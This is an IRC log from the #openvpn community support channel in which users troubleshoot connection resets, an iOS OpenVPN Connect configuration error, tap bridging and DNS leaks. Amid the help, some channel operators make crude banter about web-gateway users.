(at en.wikipedia.org) 02:27 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn 02:29 < flufmnstr> oh wow. it lost me at phase shift gates 02:29 <+pekster> Oh, that was for another channel, but I'm glad someone found entertainmnent in it :P 02:30 < flufmnstr> im quite an amateur nerd. though my interests mainly lay in partical physicas and chemistry 02:31 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 02:31 < flufmnstr> it good to see quantum computing coming along 02:31 -!- tyteen4a03 [T4@n218250228096.netvigator.com] has quit [Read error: Connection reset by peer] 02:32 -!- tyteen4a03 [T4@n218250228096.netvigator.com] has joined #openvpn 02:34 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 02:36 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 02:37 <+pekster> When I eventually retire, I should find the time to spend a few years taking courses to learn the math behind some of this quantum science stuff. Understanding Schrödinger's cat doesn't really help ini stuff like that 02:53 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn 03:03 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 240 seconds] 03:05 -!- [fred] [fred@konfuzi.us] has joined #openvpn 03:09 -!- exed [~maximus@host-88-217-184-122.customer.m-online.net] has joined #openvpn 03:19 -!- greyEAX [~grey@cpe-76-171-192-216.socal.res.rr.com] has joined #openvpn 03:25 -!- ade_b [~Ade@redhat/adeb] has quit [Remote host closed the connection] 03:35 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 03:39 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has quit [Quit: Computer has gone to sleep.] 03:53 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 03:57 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has joined #openvpn 03:59 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has quit [Remote host closed the connection] 03:59 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has joined #openvpn 03:59 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has quit [Read error: Connection reset by peer] 04:00 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has joined #openvpn 04:03 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 04:09 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Read error: Connection reset by peer] 04:09 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 04:11 -!- zz_AsadH is now known as AsadH 04:21 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 04:25 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 248 seconds] 04:34 -!- adolfomaltez1 [~taro@190.62.239.151] has joined #openvpn 04:35 -!- adolfomaltez [~taro@190.62.225.178] has quit [Ping timeout: 248 seconds] 04:41 -!- pekster [~rewt@openvpn/community/support/pekster] has quit [Quit: Changing server] 04:47 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 04:47 -!- pekster [~rewt@openvpn/community/support/pekster] has joined #openvpn 05:14 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 05:30 -!- Spooked [~SpookZA@dsl-146-42-248.telkomadsl.co.za] has joined #openvpn 05:30 -!- SpookZA [~SpookZA@197.87.53.234] has quit [Disconnected by services] 05:30 -!- Spooked is now known as SpookZA 05:36 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Read error: Connection reset by peer] 05:38 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 05:39 -!- [1]c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has joined #openvpn 05:41 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has quit [Ping timeout: 240 seconds] 05:41 -!- [1]c3vin is now known as c3vin 05:44 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 05:44 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Read error: Connection reset by peer] 06:02 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 06:03 < hg_5> hello, when im trying to build key for client1 i receive this: http://puu.sh/1Vj7p , what can be wrong, i have used winxp and win7 and same problem 06:06 -!- flufmnstr [~fluf@68-190-201-62.dhcp.snbr.ca.charter.com] has quit [Ping timeout: 256 seconds] 06:09 -!- fALSO [~falso@deadbsd.org] has joined #openvpn 06:09 < fALSO> Hi! 06:11 -!- deed02392 [~deed02392@ks353738.kimsufi.com] has quit [Ping timeout: 240 seconds] 06:11 < fALSO> anyone willing to help me out 06:11 -!- [1]c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has joined #openvpn 06:11 < fALSO> im not being able to establish a connection from a client to a openvpn server 06:11 -!- flufmnstr [~fluf@68-190-201-62.dhcp.snbr.ca.charter.com] has joined #openvpn 06:12 < fALSO> http://pastebin.com/XXcK80En 06:12 < fALSO> i keep getting this : 06:12 < fALSO> Connection reset, restarting [-1] 06:12 < fALSO> SIGUSR1[soft,connection-reset] received, client-instance restarting 06:12 < fALSO> MULTI: multi_close_instance called 06:13 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has quit [Ping timeout: 240 seconds] 06:13 -!- [1]c3vin is now known as c3vin 06:13 -!- deed02392 [~deed02392@ks353738.kimsufi.com] has joined #openvpn 06:13 -!- adolfomaltez [~taro@190.62.232.27] has joined #openvpn 06:13 -!- adolfomaltez1 [~taro@190.62.239.151] has quit [Ping timeout: 248 seconds] 06:15 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Quit: Leaving] 06:18 -!- adolfomaltez1 [~taro@190.62.244.180] has joined #openvpn 06:18 -!- adolfomaltez [~taro@190.62.232.27] has quit [Ping timeout: 248 seconds] 06:20 -!- flufmnstr [~fluf@68-190-201-62.dhcp.snbr.ca.charter.com] has quit [Ping timeout: 256 seconds] 06:24 -!- adolfomaltez1 [~taro@190.62.244.180] has quit [Ping timeout: 248 seconds] 06:25 -!- flufmnstr [~fluf@68-190-201-62.dhcp.snbr.ca.charter.com] has joined #openvpn 06:25 -!- adolfomaltez [~taro@190.62.217.193] has joined #openvpn 06:27 < fALSO> anyone knows what may cause that ? 06:28 -!- ade_b [~Ade@129.178.182.25] has joined #openvpn 06:28 -!- ade_b [~Ade@129.178.182.25] has quit [Changing host] 06:28 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 06:28 -!- spitf1r3 [~quassel@89.200.144.70] has joined #openvpn 06:43 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has joined #openvpn 06:43 -!- greyEAX [~grey@cpe-76-171-192-216.socal.res.rr.com] has quit [Ping timeout: 244 seconds] 06:45 < spitf1r3> Hi. Can somebody help me with OpenVPN connect for iOS? 06:45 < spitf1r3> I have a configuration for certificate-only authentication 06:46 < spitf1r3> I've imported cert on iOS, and selected that certificate for my configuration. 06:46 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 264 seconds] 06:47 < spitf1r3> but all I get is: "VPN-On-Demand configuration error: CertificateRef undefined" 06:47 < spitf1r3> But log window is epmpty 06:52 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 245 seconds] 06:53 -!- fALSO [~falso@deadbsd.org] has left #openvpn [] 06:57 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 256 seconds] 07:00 -!- master_of_master [~master_of@p57B54946.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 07:01 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has quit [Quit: Computer has gone to sleep.] 07:01 -!- master_of_master [~master_of@p57B55CF7.dip.t-dialin.net] has joined #openvpn 07:05 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 07:05 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 240 seconds] 07:08 < spitf1r3> I've tested same config on my Mac, and it worked 07:09 < spitf1r3> same happened, when I've tried using a "unified" configuration file 07:09 < spitf1r3> and that one worked on my mac too 07:10 -!- niervol [~krystian@193.106.244.150] has quit [Remote host closed the connection] 07:11 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 07:25 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 244 seconds] 07:26 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 07:28 -!- Porkepix [~Porkepix@157.138.189.81] has joined #openvpn 07:29 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:29 -!- Porkepix [~Porkepix@157.138.189.81] has quit [Client Quit] 07:34 -!- u0m3 [~Radu@109.96.171.40] has joined #openvpn 07:40 -!- adolfomaltez [~taro@190.62.217.193] has quit [Remote host closed the connection] 07:45 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has quit [Read error: Connection reset by peer] 07:47 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has joined #openvpn 07:52 -!- mattockl [~mattock@raidz.im] has joined #openvpn 07:53 -!- mattockl is now known as mattock 07:53 -!- mattock [~mattock@raidz.im] has quit [Changing host] 07:53 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 07:53 -!- mode/#openvpn [+o mattock] by ChanServ 07:54 < spitf1r3> Now I get something in logs; 07:54 < spitf1r3> 2013-01-31 14:30:01 EVENT: CONFIG_FILE_PARSE_ERROR option_error: remote option not specified [ERR] 07:54 < spitf1r3> 2013-01-31 14:30:01 EVENT: DISCONNECT_PENDING 07:54 -!- [1]c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has joined #openvpn 07:54 -!- [2]c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has joined #openvpn 07:54 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has quit [Ping timeout: 240 seconds] 07:54 -!- mattock_afk [~mattock@openvpn/corp/admin/mattock] has quit [Ping timeout: 240 seconds] 07:54 -!- [2]c3vin is now known as c3vin 07:54 -!- [1]c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has quit [Ping timeout: 240 seconds] 07:54 < spitf1r3> though I obviously have remote in my .ovpn config 07:56 < jY> pastebin your config 07:56 < sam1> is there any reason from a security perspective to route all client traffic through the vpn? In perspective of the remote office. Not that you are sitting as a road warrior etc. 07:57 < sam1> hm, poorly formulated question. 08:00 < rob0> sam1, consult the sales information for Cisco VPNs. They and other commercial VPN offerings will argue the point that yes, you want to route all client traffic while that client is connected. 08:01 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Ping timeout: 256 seconds] 08:01 < rob0> It reduces the chances of loss of sensitive data, but intelligent users are a much more effective defense against that. 08:02 < rob0> Would be nice if there was such a thing as intelligent users. :) 08:02 < spitf1r3> jY: http://pastie.org/5986518 08:05 < rob0> "remote 192.168.100.1 1194", you're connecting via LAN or wireless to this server? 08:05 < rob0> !goal 08:05 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 08:05 < spitf1r3> rob0: just to test it 08:05 < spitf1r3> same conf works from my macbook 08:06 < spitf1r3> and the "unified" version; http://pastie.org/5986529 08:06 < rob0> you have a route to this 192.168.100.1 address? 08:06 -!- u0m3 [~Radu@109.96.171.40] has quit [Read error: Connection reset by peer] 08:06 < sam1> hmz 08:06 < sam1> openvpn.net seems down. 08:06 < spitf1r3> yes 08:07 < spitf1r3> rob0: yes, I do 08:07 < spitf1r3> it is a 'guest' subnet 08:07 < spitf1r3> and I've connected to it for testing 08:07 < spitf1r3> but why "CONFIG_FILE_PARSE_ERROR option_error: remote option not specified [ERR]", when I DO have remote defined? 08:09 -!- u0m3 [~Radu@92.80.113.44] has joined #openvpn 08:10 < rob0> no idea, but did you try starting it with --remote on the command line? 08:10 < spitf1r3> same when I try to connect from outside, using address reacahble from outside 08:10 < spitf1r3> rob0: commandline? on iOS? 08:11 < rob0> I don't have iOS and cannot relate to what you might be trying to say. 08:11 < spitf1r3> Ok 08:12 < spitf1r3> I can try to find the bonary, as I am jailbroken 08:12 -!- m0rph [~m0rph@host81-149-146-80.in-addr.btopenworld.com] has joined #openvpn 08:12 < spitf1r3> No I can't 08:12 * rob0 just had an idea, a long shot 08:12 < spitf1r3> But why am I getting such a message? 08:13 < spitf1r3> CONFIG_FILE_PARSE_ERROR option_error: remote option not specified [ERR] 08:13 < spitf1r3> doesn;t make any sense 08:13 < rob0> ensure that the file has Unix line ends 08:13 < spitf1r3> It was edited on a Mac, it should have 08:13 < rob0> if necessary, recreate it in a Unix editor 08:13 < spitf1r3> how do I check that? 08:14 < spitf1r3> if it has correct line endings? 08:14 < rob0> maybe a question for tha Mac folks? 08:14 < spitf1r3> I have a command line on mac 08:14 < spitf1r3> any normal unix/linux command to check that? 08:16 < MorgyN> file probably will] 08:16 < spitf1r3> file Documents/openwrt01.ovpn 08:16 < spitf1r3> Documents/openwrt01.ovpn: ASCII text 08:16 < spitf1r3> Doesn't say that 08:16 < spitf1r3> but the file was created on mac, which is unix 08:16 < spitf1r3> I can recreate it in, say, nano 08:17 < MorgyN> it says dos if it has \r's i believe 08:17 < spitf1r3> that should do, right? 08:17 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 08:17 < spitf1r3> nano opens it just fine 08:17 < spitf1r3> so It's goood 08:17 -!- syoma [~syoma@186.34.232.222] has quit [Quit: leaving] 08:17 < MorgyN> ASCII text, with CRLF line terminators 08:18 < MorgyN> is what it returns for dos ones 08:18 < rob0> nano gives you the choice of line ends, when saving 08:18 < spitf1r3> okay, my files are fine, then what is wrong? 08:18 < spitf1r3> Anybody here used OVPN Connect for iOS? 08:20 < rob0> My nano in Linux offers Alt-D for DOS and Alt-M for Mac lines. 08:20 < rob0> so maybe in Mac it defaults to Mac lines? 08:20 < m0rph> is this the chan for openvpn.net? 08:21 < spitf1r3> doesn't work with either p12 from the system, ovpn with accompanying key ca and cert, nor with "unified" files that embed keys 08:21 < rob0> m0rph, as per /topic this is the OpenVPN Community Support Channel 08:22 < m0rph> Well i kinda guessed this was but wasn't certain. You know why the site is down? Trying to get the windows client 08:23 < rob0> mattock, ^^ ping? 08:25 < m0rph> can ping it, the site just appears unresponsive 08:26 < spitf1r3> https://dl.dropbox.com/u/121402/openwrt01.test.ovpn 08:27 < spitf1r3> That one has the same issue. 08:27 -!- u0m3 [~Radu@92.80.113.44] has quit [Read error: Connection reset by peer] 08:29 < spitf1r3> I had 504 Gateway Time-out on openvpn.net 08:30 < spitf1r3> And regarding my problem: I have the same issue as here as well, but I'm NOT setting up a VPN on demand entry: https://forums.openvpn.net/topic12019.html 08:30 <@vpnHelper> Title: OpenVPN Support Forum VPN-On-Demand configuration error: CertificateRef undefined : OpenVPN Connect (iOS) (at forums.openvpn.net) 08:31 -!- u0m3 [~Radu@109.96.129.81] has joined #openvpn 08:31 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 08:32 -!- [1]c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has joined #openvpn 08:32 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has quit [Ping timeout: 240 seconds] 08:32 -!- [1]c3vin is now known as c3vin 08:36 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 08:37 < jackbrown> hi there 08:37 < jackbrown> if i set a proxy into the Linux OPENVPN mask = my machine -->proxy---->VPN ?? correct ? 08:56 -!- scoates [~sean@iconoclast.caedmon.net] has joined #openvpn 08:57 < scoates> Is this the right place to talk about the iOS app? or is that better elsewhere? 08:58 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 255 seconds] 08:58 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has quit [Ping timeout: 246 seconds] 08:59 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 08:59 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn 09:00 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 09:02 -!- [1]c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has joined #openvpn 09:02 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has quit [Ping timeout: 240 seconds] 09:02 -!- cherwin [~cherwin@ip4da6274e.direct-adsl.nl] has quit [Ping timeout: 240 seconds] 09:02 -!- [1]c3vin is now known as c3vin 09:02 -!- cherwin [~cherwin@ip4da6274e.direct-adsl.nl] has joined #openvpn 09:16 -!- DBordello [~DBordello@unaffiliated/dbordello] has quit [Quit: ZNC - http://znc.in] 09:17 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn 09:18 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 09:18 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 09:24 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has quit [Quit: leaving] 09:24 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 09:26 -!- m0rph [~m0rph@host81-149-146-80.in-addr.btopenworld.com] has quit [Quit: Leaving] 09:28 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 255 seconds] 09:31 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 264 seconds] 09:31 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 09:32 < hg_5> hello i have just bought recently intel ssd G2 80gb, and i was trying to install windows 7 home edition on core2duo PC, and i can't past this progress, i have waiter more than 30 minutes and nothing happeneed http://puu.sh/1VmnP 09:32 < hg_5> sorry wrong room.. 09:35 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Remote host closed the connection] 09:39 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 09:41 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 09:44 -!- Porkepix [~Porkepix@157.138.189.81] has joined #openvpn 09:53 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 09:59 -!- Porkepix [~Porkepix@157.138.189.81] has quit [Quit: Computer has gone to sleep.] 10:01 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds] 10:07 -!- Devastator- [~devas@177.99.152.118] has joined #openvpn 10:08 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 245 seconds] 10:11 -!- Dashers [dash@home.aligrant.com] has joined #openvpn 10:12 < Dashers> Hi all. I am having trouble getting tap working. I've got a Linux server and a Windows client. I have got to the point that the windows client connects and obtains an IP address from a DHCP server *behind* the server. I can ping the server from the client, but not the otherway around, nor can I ping any other address behind the network despite the pings getting to the desitnation fine, the reply never makes it back. 10:12 < Dashers> Any idea? 10:13 < Dashers> There are no firewalls running 10:15 < Dashers> I guess it's something to do with the bridge 10:19 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:29 <@dazo> Dashers: why do you bridge? 10:30 -!- oyunokata [~rrinehart@209.163.177.130] has joined #openvpn 10:31 < oyunokata> !wecolme 10:31 < Dashers> Because that's the only option available in this situation. I've only ever done routed before. 10:32 < Dashers> I guess I'm missing something at the networking layer of the server. Just not sure what. 10:32 < Dashers> I've created a bridge, and everything seems connected up ok. Indeed I can ping client->server, just not the other way. 10:33 < Dashers> Monitoring the network I can pick up pings coming from the client, and seeing responses, they just never make it. 10:39 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 10:46 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has quit [Remote host closed the connection] 10:48 < Dashers> Well, I've identified that the ping replies don't make it back to the server either. But I've ran out of time for today. 10:48 < Dashers> Guess it's something to do with that errie world of arp 10:48 -!- raidz_away is now known as raidz 10:52 -!- Dashers [dash@home.aligrant.com] has quit [Quit: fnar] 11:30 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has joined #openvpn 11:33 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 11:35 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 252 seconds] 11:37 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Quit: Leaving] 11:38 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 11:53 -!- Devastator- [~devas@177.99.152.118] has quit [Changing host] 11:53 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 11:53 -!- Devastator- is now known as Devastator 11:55 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has joined #openvpn 11:55 -!- greyEAX [~grey@cpe-76-171-192-216.socal.res.rr.com] has joined #openvpn 12:05 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 12:08 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 264 seconds] 12:22 -!- Devastator- [~devas@177.99.152.118] has joined #openvpn 12:22 -!- Devastator- [~devas@177.99.152.118] has quit [Changing host] 12:22 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 12:22 -!- AsadH is now known as zz_AsadH 12:25 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 276 seconds] 12:25 -!- Devastator- is now known as Devastator 12:30 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 12:30 -!- mode/#openvpn [+o krzee] by ChanServ 12:33 -!- mode/#openvpn [+v pekster] by ChanServ 12:34 -!- exed [~maximus@host-88-217-184-122.customer.m-online.net] has quit [Ping timeout: 245 seconds] 12:34 -!- dazo is now known as dazo_afk 12:44 -!- u0m3_ [~Radu@92.80.84.80] has joined #openvpn 12:47 -!- u0m3 [~Radu@109.96.129.81] has quit [Ping timeout: 276 seconds] 12:49 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has joined #openvpn 12:56 <+pekster> Have we traditionally had issues with web gateway users? They're apparently banned, and I'd hate to undo that if there's a good reason for it 13:00 < EugeneKay> I don't recall any specific incidents in this channel; likely becauseo of the long-standing ban. 13:01 -!- greyEAX [~grey@cpe-76-171-192-216.socal.res.rr.com] has quit [Ping timeout: 244 seconds] 13:01 <@ecrist> yes 13:01 <@ecrist> web users tend to be either spammers, or stupid 13:01 < EugeneKay> I have seen issues recently in other large channels with them. Too lazy to get a real IRC client equates to too lazy to google the fucking problem. 13:02 <+pekster> Ah, okay. I guess I spend more time on other channels that get semi-decent web users then. I must pick channels that aren't worthwhile to spam :P 13:02 < EugeneKay> #git allows them to /join(quiet-ban), but they have to be able to read the topic and figure out to /msg the bot for voice. 13:02 < EugeneKay> This is more challenging than you might think 13:03 <@ecrist> heh 13:03 <@ecrist> the unreal ircd channel requires users to join, the bot sends new users a link, via PM, to a quiz. only after they pass the quiz are the allowed to talk 13:03 -!- greyEAX [~grey@cpe-76-171-192-216.socal.res.rr.com] has joined #openvpn 13:05 <+pekster> There was a nifty new capcha-style someone came up with that leveraged empathy in the reply, so until we teach bots to feel, I liked the idea there 13:05 <@krzee> they often dont understand ANYTHING about networking 13:05 <+pekster> Regardless, our topic can't really spare the space to change the +b to +q, so I'm happy leaving it. Just curious 13:06 <@krzee> "hey guise, wanna setup my vpn for me?" 13:06 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has quit [Ping timeout: 264 seconds] 13:06 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 13:07 <@ecrist> and, as soon as someone says no, the inevitable "go fuck yourself! I thought you were supposed to help! your program will never be popular with your attitudz fag!" 13:07 <@krzee> lolyes 13:07 <@ecrist> /ragequit 13:13 < jackbrown> If I'm using a VPN witha cert (the provider gave me) Does my actual Internet Provider can see wich http pages I visit or just the VPN provider ? 13:14 < EugeneKay> I presume you're doing redirection, in which case your ISP would see only the encapsulated VPN traffic 13:14 <@ecrist> it depends 13:14 <@ecrist> possibly the DNS query, if that's not routed properly 13:14 < EugeneKay> Plus any leaks(DNS being the most common) 13:19 < jackbrown> EugeneKay: how can I check DNS LEAKS ? 13:19 <+pekster> I suspect the "DNS leaks" problem is mostly people using their LAN gw's forwarding resolver and having the implicit route allow that 13:20 < jackbrown> pekster: ? 13:21 < rob0> jackbrown, there are no "DNS leaks" if your DNS queries are routed through the tunnel. The easiest way is to use 8.8.4.4 in place of your ISP nameserver[s]. 13:21 < jackbrown> rob0: what means ? The easiest way is to use 8.8.4.4 in place of your ISP nameserver 13:21 < jackbrown> rob0: I use www.dnsleakstest.com 13:22 < jackbrown> http://www.dnsleaktest.com/ 13:22 <@vpnHelper> Title: DNS leak test (at www.dnsleaktest.com) 13:23 < jackbrown> rob0: is this website enough? 13:24 <+pekster> Not really, if you aren't going to take the time to understand the concepts behind the problem. Use of multiple DNS servers leads to intermittent access to each depending on factors out of your control 13:25 < jackbrown> pekster: where can i understand the problem ? 13:25 < jackbrown> pekster: I'm using Linux Mint and OpenVPN 13:26 <+pekster> By reading the information we've posted. If you define your ISP's reesolvers anywhere in your setup, you may end up sending requests to them. If you define a LAN resolver (eg: on your router) that device will send requests where it's configured to, and it doesn't have your VPN 13:27 <+pekster> So, your solution is to remove all references, explicit or implied by using other LAN equipment, from your DNS resolver setup (usually /etc/resolv.conf under Linux, although follow your distro's information for doing this) 13:29 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 13:30 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 13:53 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 248 seconds] 13:54 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 14:02 -!- brute11k [~brute11k@89.249.230.207] has quit [Ping timeout: 255 seconds] 14:04 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 14:04 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 14:04 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 14:04 -!- mode/#openvpn [+o krzee] by ChanServ 14:05 -!- brute11k [~brute11k@89.249.230.108] has joined #openvpn 14:09 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 14:12 -!- brute11k [~brute11k@89.249.230.108] has quit [Quit: Leaving.] 14:15 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has joined #openvpn 14:15 -!- mode/#openvpn [+o EugeneKay] by ChanServ 14:15 <@EugeneKay> Ergh, wrong alias 14:16 -!- mode/#openvpn [+v EugeneKay] by EugeneKay 14:16 <+EugeneKay> There. 14:16 -!- mode/#openvpn [-o EugeneKay] by EugeneKay 14:17 <+pekster> What, no alias to undo the damage caused by that one and +v-o you you ? :P 14:17 <+pekster> /ohwaitIdidntwantthatone 14:17 <+EugeneKay> Just talking out loud 14:18 <+pekster> Sometimes it helps. Late last night I got my IPv6 routing fixed after I asked (and then answered) my own question in another network :) 14:18 < rob0> you can "/mode +v-o EugeneKay EugeneKay" in one command, fwiw 14:19 <+EugeneKay> Meh, laziness. 14:19 <+pekster> But, The Internet wants to help make your IRC experience as efficient as possible :D 14:19 <+EugeneKay> The internet is for porn 14:20 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 14:22 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 276 seconds] 14:31 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has quit [Quit: Leaving] 14:32 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 14:32 -!- mode/#openvpn [+o krzee] by ChanServ 14:33 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 14:33 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Remote host closed the connection] 14:34 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 255 seconds] 14:34 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 14:34 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 14:34 -!- mode/#openvpn [+o krzee] by ChanServ 14:35 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 245 seconds] 14:48 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 14:52 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 272 seconds] 14:53 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds] 14:54 -!- zz_AsadH is now known as AsadH 15:15 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 15:19 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 15:20 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 15:25 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 15:26 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 15:29 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 15:31 -!- voyo [~voyo@213-134-188-198.home.aster.pl] has joined #openvpn 15:32 < voyo> hello, I'd like to configure openvpn server with separate interface (tun or tap) for each 